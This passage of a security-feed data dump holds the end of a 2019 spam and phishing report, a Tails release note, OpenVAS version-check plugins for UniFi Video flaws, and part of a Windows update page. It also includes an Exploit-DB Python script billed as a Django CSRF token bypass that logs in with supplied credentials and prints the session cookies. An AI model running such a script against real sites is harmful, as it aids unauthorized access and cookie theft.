Apple services. The number of fake sites rose sharply after the company unveiled its new products. And while Apple was only just preparing to release the next gadget, fraudsters were offering to \"sell\" it to those with itchy hands. All that victim had to do was follow a link and enter their AppleID credentials \u2014 the attackers' objective.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150358/sl_spamreport_2019_03.png>)\n\n### The price of fame: attackers exploit popular resources\n\nIn 2019, scammers found new ways to exploit popular resources and social networks to spread spam and sell non-existent goods and services. They actively used Youtube and Instagram comments to place ads and links to potentially malicious pages, and created numerous social media accounts that they promoted by commenting on the posts of popular bloggers.\n\nFor added credibility, they left many fake comments on posts about hot topics. As the account gained a following, it began to post messages about promotions. For example, a sale of branded goods at knock-down prices. Victims either received a cheap imitation or simply lost their cash.\n\nA similar scheme was used to promote get-rich-quick-online videos, coupled with gushing reviews from \"newly flush\" clients.\n\nAnother scam involved fake celebrity Instagram accounts. The \"stars\" asked fans to take a survey and get a cash payout or the chance to participate in a prize draw. Naturally, a small upfront fee was payable for this unmissable opportunity\u2026 After the cybercriminals received the money, the account simply disappeared.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150356/sl_spamreport_2019_04.png>)\n\nBesides distributing links through comments on social networks, scammers utilized yet another delivery method in the shape of Google services: invitations to meetings sent via Google Calendar or notifications from Google Photos that someone just shared a picture were accompanied by a comment from the attackers with links to fake promotions, surveys, and prize giveaways.\n\nOther Google services were also used: links to files in Google Drive and Google Storage were sent inside fraudulent e-mails, which spam filters are not always able to spot. Clicking it usually opened a file with adware (for example, fake pharmaceutical products) or another link leading to a phishing site or a form for collecting personal data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150356/sl_spamreport_2019_05.png>)\n\nAlthough Google and others are constantly working to protect users from scammers, the latter are forever finding new loopholes. Therefore, the main protection against such schemes is to pay careful attention to messages from unfamiliar senders.\n\n### Malicious transactions\n\nIn Q1, users of the Automated Clearing House (ACH), an electronic funds-transfer system that facilitates payments in the US, fell victim to fraudsters: we registered mailings of fake ACH notifications about the status of a payment or debt. By clicking the link or opening the attachment, the user risked infecting the computer with malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150355/sl_spamreport_2019_06.png>)\n\n### Anyone order bitcoin?\n\nCryptocurrency continues to be of interest to scammers. Alongside the standard fakes of well-known cryptocurrency exchanges, cybercriminals have started creating their own: such resources promise lucrative exchange rates, but steal either personal data or money.\n\n### [](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150356/sl_spamreport_2019_07.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150354/sl_spamreport_2019_08.png>)\n\n### Cryptocurrencies and blackmail\n\nIf in 2018 cybercriminals tried to blackmail users by claiming to have malware-obtained compromising material on them, in 2019 e-mails began arriving from a CIA agent (the name varied) supposedly dealing with a case opened against the message recipient pertaining to the storage and distribution of pornographic images of minors.\n\nThe case, the e-mail alleged, was part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"agent\" happened to know that the recipient was a well-heeled individual with a reputation to protect, and for $10,000 in bitcoin would be willing to alter or destroy the dossier (all information about the victim to add credence to the e-mail was harvested in advance from social networks and forums). For someone genuinely afraid of the potential consequences, this would be a small price to pay.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150352/sl_spamreport_2019_09.png>)\n\nLegal entities found themselves in an even more desperate situation when faced with similar threats. However for them it was not about sextortion, but spamming. The blackmailers sent a message to the company using its public e-mail address or online feedback form in which they demanded a ransom in bitcoin. If refused, the attackers threatened to send millions of spam e-mails in the company's name. This, the cybercriminals assured, would prompt the Spamhaus Project to recognize the resource as a spammer and block it forever.\n\n### [](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150350/sl_spamreport_2019_10.png>)\n\n### Corporate sector in the crosshairs\n\nThe growing trend for attacks on the corporate sector is reflected not only in the attempts to cyber-blackmail companies. The reputation of many firms has been compromised by spam mailings through feedback forms. Having previously used such forms to attack the mailboxes of company employees, in 2019 cybercriminals evolved their methods.\n\nAs such, messages about successful registation on a particular website were received by people who had never even heard about it. After finding a security hole in the site, spammers used a script to bypass the CAPTCHA system and mass-register users via the feedback form. In the Username field, the attackers inserted message text or link. As a result, the victim whose mailing address was used received a registration confirmation e-mail from a legitimate sender, but containing a message from the scammers. Moreover, the company itself had no idea that this was going on.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150350/sl_spamreport_2019_11.png>)\n\nA far more serious threat came from mailings masked as automatic notifications from services used to compile legitimate mailing lists: the scammers' messages were carefully disguised as notifications about new voice messages (some business products have a feature for exchanging voice messages) or about incoming e-mails stuck in the delivery queue. To access them, the employee had to go through an authentication process, whereupon the corporate account credentials ended up in the hands of the attackers.\n\nScammers devised new methods to coax confidential data out of unsuspecting company employees. For example, by sending e-mails requesting urgent confirmation of corporate account details or payment information with a link conveniently supplied. If the user swallowed the bait, the authentication data for their account went straight to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150349/sl_spamreport_2019_12.png>)\n\nAnother attack aimed at the corporate sector employed a more complex scheme: the attackers tried to dupe e-mail recipients into thinking that the company management was offering a pay rise in exchange for taking a performance review.\n\nThe message appeared to come from HR and contained detailed instructions and a link to a bogus appraisal form. But before going through the procedure, the recipient had to enter a few details (in most cases it was specified that the e-mail address had to be a corporate one). After clicking the Sign in or Appraisal button, the entered credentials were duly forwarded to the attackers, granting them access to business correspondence, personal data, and probably confidential information too, which could later be used for blackmail or sold to competitors.\n\nA simpler scheme involved sending phishing e-mails supposedly from services used by the company. The most common were fake notifications from HR recruiting platforms.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150348/sl_spamreport_2019_13.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\nThe share of spam in mail traffic in 2019 increased by 4.03 p.p. to 56.51%.\n\n_Proportion of spam in global mail traffic, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150545/sl_spamreport_2019_charts_01-en-spam-report-2019-diagramme-und-bilder.png>)_\n\nThe lowest figure was recorded in September (54.68%), and the highest in May (58.71%).\n\n### Sources of spam by country\n\nIn 2019, as in the year before, China retained its crown as the top spam-originating country. Its share grew significantly from the previous year (up 9.57 p.p.) to 21.26%. It remains ahead of the US (14.39%), whose share increased by 5.35 p.p. In third place was Russia (5.21%).\n\nFourth position went to Brazil (5.02%), despite shedding 1.07 p.p. Fifth place in 2019 was claimed by France (3.00%), and sixth by India (2.84%), which ranked the same as the year before. Vietnam (2.62%), fourth in the previous reporting period, moved down to seventh.\n\nThe TOP 10 is rounded out by Germany, dropping from third to eighth (2.61%, down by 4.56 p.p.), Turkey (2.15%), and Singapore (1.72%).\n\n_Sources of spam by country, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150348/sl_spamreport_2019_charts_02_ransomware-geo.png>)_\n\n### Spam e-mail size\n\nIn 2019, the share of very small e-mails continued to grow, but less dramatically than the year before \u2014 by just 4.29 p.p. to 78.44%. Meanwhile, the share of e-mails sized 2\u20135 KB decreased against 2018 by 4.22 p.p. to 6.42%.\n\n_Spam e-mails by size, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150341/sl_spamreport_2019_charts_03-spam-report-2019-diagramme-und-bilder.png>)_\n\nThe share of larger e-mails (10\u201320 KB) changed insignificantly, down by 0.84 p.p. But there was more junk mail sized 20\u201350 KB: such messages accounted for 4.50% (+1.68 p.p) In addition, the number of 50\u2013100 KB sized e-mails rose by almost 1 p.p, amounting to 1.81%.\n\n### Malicious mail attachments\n\n#### Malware families\n\n_TOP 10 malware families, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150341/sl_spamreport_2019_charts_04-spam-report-2019-diagramme-und-bilder.png>)_\n\nIn 2019, like the year before it, **Exploit.Win32.CVE-2017-11882** malicious objects were the most commonly encountered malware (7.24%). They exploited a vulnerability in Microsoft Office that allowed arbitrary code to be executed without the user's knowledge.\n\nIn second place is the **Trojan.MSOffice.SAgent** family (3.59%), whose members also attack Microsoft Office users. This type of malware consists of a document with a built-in VBA script that secretly loads other malware using PowerShell when the document is opened.\n\nThe **Worm.Win32.WBVB** family (3.11%), which includes executable files written in Visual Basic 6 and classed as untrusted by KSN, rose from fourth place in the rating to third.\n\n**Backdoor.Win32.Androm.gen** (1.64%), which ranked second in the previous reporting period, dropped to fourth position. This modular backdoor is most often used to download malware onto the victim's machine.\n\nFifth place in 2019 was taken by the **Trojan.Win32.Kryptik** family (1.53%). This verdict is assigned to Trojans that use anti-emulation, anti-debugging, and code obfuscation to make them difficult to analyze.\n\n**Trojan.MSIL.Crypt.gen** (1.26%) took sixth place, while **Trojan.PDF.Badur** (1.14%) \u2014 a PDF that directs the user to a potentially dangerous site \u2014 climbed to seventh.\n\nEighth position fell to another malicious DOC/DOCX document with a malicious VBA script inside \u2014 **Trojan-Downloader.MSOffice.SLoad.gen** (1.14%), which, when opened, may download ransomware onto the victim's computer.\n\nIn ninth place is **Backdoor.Win32.Androm**, and propping up the table is **Trojan.Win32.Agent** (0.92%).\n\n \n\n### Countries targeted by malicious mailings\n\nAs in the previous year, Germany took first place in 2019. Its share remained virtually unchanged: 11.86% of all attacks (+0.35 p.p.). Second place was claimed jointly by Russia and Vietnam (5.77% each) \u2014 Russia held this position in the previous reporting period, while Vietnam's rise to the TOP 3 came from sixth position.\n\n_Countries targeted by malicious mailings, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150341/sl_spamreport_2019_charts_05_en-ransomware-geo.png>)_\n\nLagging behind by just 0.2 p.p. is Italy (5.57%), while the UAE is in fifth place (4.74%), Brazil in sixth (3.88%), and Spain in seventh (3.45%). The TOP 10 is rounded out by the practically neck-and-neck India (2.67%), Mexico (2.63%), and Malaysia (2.39%).\n\n## Statistics: phishing\n\nIn 2019, the Anti-Phishing system was triggered **467 188 119** times on Kaspersky user computers as a result of phishing redirection attempts (15,277,092 fewer than in 2018). In total, 15.17% of our users were attacked.\n\n### Organizations under attack\n\n_The rating of organizations targeted by phishing attacks is based on the triggering of the heuristic component in the Anti-Phishing system on user computers. This component detects all instances when the user tries to follow a link in an e-mail or on the Internet to a phishing page in cases when such link has yet to be added to Kaspersky's databases._\n\n#### Rating of categories of organizations attacked by phishers\n\nIn contrast to 2018, in this reporting period the largest share of heuristic component triggers fell to the Banks category. Its slice increased by 5.46 p.p. to 27.16%. Last year's leader, the Global Internet Portals category, moved down a rung to second. Against last year, its share decreased by 3.60 p.p. (21.12%). The Payment Systems category remained in third place, its share in 2019 amounting to 16.67% (-2.65 p.p.).\n\n_Distribution of organizations subject to phishing attacks by category, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150331/sl_spamreport_2019_charts_06-en-spam-report-2019-diagramme-und-bilder.png>)_\n\n### Attack geography\n\n#### Countries by share of attacked users\n\nThis period's leader by percentage of attacked unique users out of the total number of users was Venezuela (31.16%).\n\n_Percentage of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky users in the country, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150332/sl_spamreport_2019_charts_07-en-ransomware-geo.png>)_\n\n \n\n#### TOP 10 countries by share of attacked users\n\n**Country** | **%** \n---|--- \nVenezuela | 31.16 \nBrazil | 30.26 \nGreece | 25.96 \nPortugal | 25.63 \nAustralia | 25.24 \nAlgeria | 23.93 \nChile | 23.84 \nR\u00e9union | 23.82 \nEcuador | 23.53 \nFrench Guiana | 22.94 \n \n_TOP 10 countries by share of attacked users_\n\nLast year's leader, Brazil (30.26%), this year found itself in second place, shedding 1.98 p.p. and ceding top spot to Venezuela (31.16%), which moved up from ninth position, gaining 11.27 p.p. In third place was TOP 10 newcomer Greece (25.96%).\n\n## Wrap-up\n\nTV premieres, high-profile sporting events, and the release of new gadgets were exploited by scammers to steal users' personal data or money.\n\nIn the search for new ways to bypass spam filters, attackers are developing new methods of delivering their messages. This year, they made active use of various Google services, as well as popular social networks (Instagram) and video hosting sites (YouTube).\n\nCybercriminals continue to use the topic of finance in schemes aimed at gaining access to users' personal data, infecting computers with malware, or stealing funds from victims' accounts.\n\nThe main trend of 2019 was the rise in the number of attacks on the corporate sector. Fraudulent schemes previously used to repeatedly attack ordinary users changed direction, adding new intricacies to cybercriminal tactics.", "modified": "2020-04-08T10:00:10", "published": "2020-04-08T10:00:10", "id": "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "href": "https://securelist.com/spam-report-2019/96527/", "type": "securelist", "title": "Spam and phishing in 2019", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2020-04-08T04:46:53", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-aKaFBiOsKMo/Xo0gfILum1I/AAAAAAAASOU/tx9OUVZUsh8DbYoTFGoVy0cidDtUHTeRQCNcBGAsYHQ/s1600/tails_grub.png>)\n\n \nThe Tails team is happy to publish Tails 4.5, the first version of Tails to support Secure Boot. \nThis release also fixes [ many security vulnerabilities ](<https://tails.boum.org/security/Numerous_security_holes_in_4.4.1/>) . You should upgrade as soon as possible. \n \n\n\n# New features \n\n## Secure Boot \n\nTails now starts on computers with Secure Boot enabled. \nIf your Mac displays the following error: \nSecurity settings do not allow this Mac to use an external startup disk. \nThen you have to [ change the settings of the _ Startup Security Utility _ ](<https://tails.boum.org/install/mac/usb/#startup-security>) of your Mac to authorize starting from Tails. \n \n\n\n# Changes and updates \n\n * Update _ Tor Browser _ to 9.0.9. \nThis update fixes several [ vulnerabilities ](<https://www.mozilla.org/en-US/security/advisories/mfsa2020-13/>) in _ Firefox _ , including [ some critical ones ](<https://www.mozilla.org/en-US/security/advisories/mfsa2020-11/>) . \nMozilla is aware of targeted attacks in the wild abusing these vulnerabilities. \n\n \n\n\n# Known issues \n\nNone specific to this release. \nSee the list of [ long-standing issues ](<https://tails.boum.org/support/known_issues/>) . \n \n\n\n# Get Tails 4.5 \n\n## To upgrade your Tails USB stick and keep your persistent storage \n\n * Automatic upgrades are available from Tails 4.2 or later to 4.5. \n * If you cannot do an automatic upgrade or if Tails fails to start after an automatic upgrade, please try to do a [ manual upgrade ](<https://tails.boum.org/doc/upgrade/#manual>) . \n\n \n\n\n## To install Tails on a new USB stick \n\nFollow our installation instructions: \n\n\n * [ Install from Windows ](<https://tails.boum.org/install/win/>)\n * [ Install from macOS ](<https://tails.boum.org/install/mac/>)\n * [ Install from Linux ](<https://tails.boum.org/install/linux/>)\nAll the data on this USB stick will be lost. \n \n \n \n\n\n[ ** Download Tails 4.5 ** ](<https://tails.boum.org/install/download/>)\n", "modified": "2020-04-08T00:55:12", "published": "2020-04-08T00:55:12", "id": "KITPLOIT:1295159706914153088", "href": "http://www.kitploit.com/2020/04/tails-45-live-system-to-preserve-your.html", "title": "Tails 4.5 - Live System to Preserve Your Privacy and Anonymity", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2020-04-08T16:46:59", "bulletinFamily": "scanner", "description": "UniFi Video on Windows is prone to a privilege escalation vulnerability.", "modified": "2020-04-08T00:00:00", "published": "2020-04-08T00:00:00", "id": "OPENVAS:1361412562310143681", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310143681", "title": "UniFi Video < 3.10.3 Privilege Escalation Vulnerability", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from the referenced\n# advisories, and are Copyright (C) by the respective right holder(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:ui:unifi_video\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.143681\");\n script_version(\"2020-04-08T05:57:35+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-08 11:51:46 +0000 (Wed, 08 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-08 04:52:39 +0000 (Wed, 08 Apr 2020)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2020-8146\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"UniFi Video < 3.10.3 Privilege Escalation Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_ubnt_unifi_video_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ubnt/unifi_video/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"UniFi Video on Windows is prone to a privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"UniFi contains a local privileges escalation to SYSTEM from arbitrary file\n deletetion and a DLL hijack vulnerability.\");\n\n script_tag(name:\"affected\", value:\"UniFi Video version 3.10.2 and prior on Windows.\");\n\n script_tag(name:\"solution\", value:\"Update to version 3.10.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://community.ui.com/releases/Security-advisory-bulletin-006-006/3cf6264e-e0e6-4e26-a331-1d271f84673e\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif (version_is_less(version: version, test_version: \"3.10.3\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"3.10.3\", install_path: location);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T16:46:59", "bulletinFamily": "scanner", "description": "UniFi Video on Windows is prone to multiple vulnerabilities.", "modified": "2020-04-08T00:00:00", "published": "2020-04-08T00:00:00", "id": "OPENVAS:1361412562310143680", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310143680", "title": "UniFi Video <= 3.9.3 Multiple Vulnerabilities", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from the referenced\n# advisories, and are Copyright (C) by the respective right holder(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:ui:unifi_video\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.143680\");\n script_version(\"2020-04-08T05:57:35+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-08 11:51:46 +0000 (Wed, 08 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-08 04:33:54 +0000 (Wed, 08 Apr 2020)\");\n script_tag(name:\"cvss_base\", value:\"5.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2020-8144\", \"CVE-2020-8145\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"UniFi Video <= 3.9.3 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_ubnt_unifi_video_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ubnt/unifi_video/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"UniFi Video on Windows is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"UniFi Video on Windows is prone to multiple vulnerabilities:\n\n - Path traversal vulnerability (CVE-2020-8144)\n\n - Configuration manipulation vulnerability (CVE-2020-8145)\");\n\n script_tag(name:\"affected\", value:\"UniFi Video version 3.9.3 and prior on Windows.\");\n\n script_tag(name:\"solution\", value:\"Update to version 3.9.4 or later.\");\n\n script_xref(name:\"URL\", value:\"https://community.ui.com/releases/Security-advisory-bulletin-006-006/3cf6264e-e0e6-4e26-a331-1d271f84673e\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif (version_is_less_equal(version: version, test_version: \"3.9.3\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"3.9.4\", install_path: location);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 5.2, "vector": "AV:A/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2020-04-08T09:44:13", "bulletinFamily": "exploit", "description": "", "modified": "2020-04-08T00:00:00", "published": "2020-04-08T00:00:00", "id": "EDB-ID:48303", "href": "https://www.exploit-db.com/exploits/48303", "type": "exploitdb", "title": "Django 3.0 - Cross-Site Request Forgery Token Bypass", "sourceData": "# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass\r\n# Date: 2020-04-08\r\n# Exploit Author: Spad Security Group\r\n# Vendor Homepage: https://www.djangoproject.com/\r\n# Software Link: https://pypi.org/project/Django/\r\n# Version: 3.0 =<\r\n# Tested on: windows 10\r\n# Language: python3.8\r\n\r\n# t.me/SpadSec\r\n# Spad Security Group\r\n\r\n\r\nfrom requests import Session\r\nimport sys\r\nfrom bs4 import BeautifulSoup\r\nfrom time import sleep\r\nfrom colorama import Fore, Style\r\nfrom random import choice\r\nfrom os import name, system\r\n\r\ncolors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW]\r\n\r\n\r\ndef cleaner():\r\n if name == \"nt\":\r\n system(\"cls\")\r\n else:\r\n system(\"clear\")\r\n\r\ndef logo_printer():\r\n cleaner()\r\n logo = r\"\"\"\r\n \\_______/\r\n `.,-'\\_____/`-.,'\r\n /`..'\\ _ /`.,'\\\r\n / /`.,' `.,'\\ \\\r\n/__/__/ \\__\\__\\__\r\n\\ \\ \\ / / /\r\n \\ \\,'`._,'`./ /\r\n \\,'`./___\\,'`./\r\n ,'`-./_____\\,-'`.\r\n / \\\r\n \"\"\"\r\n _logo_enumer = 0\r\n for char in logo:\r\n sys.stdout.write(f\"{choice(colors)}{char}{Style.RESET_ALL}\")\r\n sys.stdout.flush()\r\n _logo_enumer +=1\r\n sleep(0.005)\r\n print(f\"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \\n{colors[3]}\\tt.me/SpadSec\")\r\n\r\nclass DjangoCsrfMiddleWareBypass:\r\n def __init__(self, url: str, username: str, password: str):\r\n self.url = url\r\n self.username = username\r\n self.password = password\r\n logo_printer()\r\n self.cookies = {}\r\n self.session = Session()\r\n self.bypass()\r\n \r\n def spad_printer(self, string):\r\n print(\"\\n\")\r\n for char in string:\r\n sys.stdout.write(char)\r\n sys.stdout.flush()\r\n sleep(0.05)\r\n\r\n def bypass(self):\r\n global colors\r\n _conn = self.session.get(self.url)\r\n self.spad_printer(f\"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}\")\r\n self.spad_printer(f\"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...\")\r\n for key, value in _conn.cookies.items():\r\n self.cookies[key] = value\r\n self.spad_printer(f\"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Bypassed Cookies ;)!\")\r\n\r\n soup = BeautifulSoup(_conn.text, \"lxml\")\r\n csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']\r\n self.spad_printer(f\"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}\")\r\n\r\n login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies)\r\n if len(login.history) >= 2:\r\n if login.history[1].is_redirect:\r\n self.spad_printer(f\"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in\")\r\n else:\r\n self.spad_printer(\"[-] Error\")\r\n else:\r\n if login.history:\r\n if login.history[0].is_redirect:\r\n self.spad_printer(f\"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}\")\r\n for key, value in self.session.cookies.items():\r\n self.spad_printer(f\"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}\")\r\n else:\r\n self.spad_printer(f\"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error\")\r\n else:\r\n self.spad_printer(f\"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error\")\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n url = sys.argv[1]\r\n username = sys.argv[2]\r\n password = sys.argv[3]\r\n DjangoCsrfMiddleWareBypass(url, username, password)\r\n except IndexError:\r\n logo_printer()\r\n for char in f\"[!] python {sys.argv[0]} http://google.com username password\":\r\n sys.stdout.write(char)\r\n sys.stdout.flush()\r\n sleep(0.05)", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/48303"}], "mskb": [{"lastseen": "2020-04-08T14:32:10", "bulletinFamily": "microsoft", "description": "<html><body><p>Learn more about update KB4540681, including improvements and fixes, any known issues, and how to get the update.</p><h2></h2><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong>Reminder\u00a0</strong>March 12 and April 9\u00a0were the last two Delta updates for Windows 10, version\u00a01709. Security and quality updates will continue to be available via the express and full cumulative update packages. For more information on this change please visit our <a href=\"https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/Windows-10-quality-updates-explained-amp-the-end-of-delta/ba-p/214426\" managed-link=\"\" target=\"_blank\">blog</a>.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong><span>Reminder</span></strong><span>\u00a0Windows 10, version 1709, reached end of service on April 9, 2019 for devices running Windows 10 Home, Pro, Pro for Workstation, and IoT Core editions. These devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.</span></p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong><span><span>IMPORTANT\u00a0</span></span></strong><span><span>Windows 10 Enterprise, Education, </span></span><span>and IoT Enterprise</span><span><span> editions will </span></span><span>continue to <span>receive </span>servicing <span>at no cost</span></span>\u00a0per the\u00a0lifecycle announcement on October 2018.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><p class=\"alert-title\">ePub support ended in Microsoft Edge</p><div class=\"row\"><div class=\"col-xs-24\"><p>Microsoft Edge has ended support for e-books that use the .epub file extension. For more information, see <a href=\"https://support.microsoft.com/help/4517840\" managed-link=\"\" target=\"_blank\">Download an ePub app to keep reading e-books</a>.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p>For more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following <a data-content-id=\"824684\" data-content-type=\"article\" href=\"\" managed-link=\"\">article</a>.</p></div></div></div></div><h2>Highlights</h2><ul><li><span><span>Updates to improve security when using Microsoft Office products.</span></span></li><li><span><span>Updates to improve security when using Microsoft Edge and Internet Explorer.</span></span></li><li><span><span><span>Updates for verifying user names and passwords.</span></span></span></li><li><span>Updates to improve security when Windows performs basic operations.</span></li><li><span><span><span>Updates for storing and managing files.</span></span></span></li><li>Updates to improve security when using external devices (such as game controllers, printers, and web cameras).</li><li>Updates an issue that might prevent icons 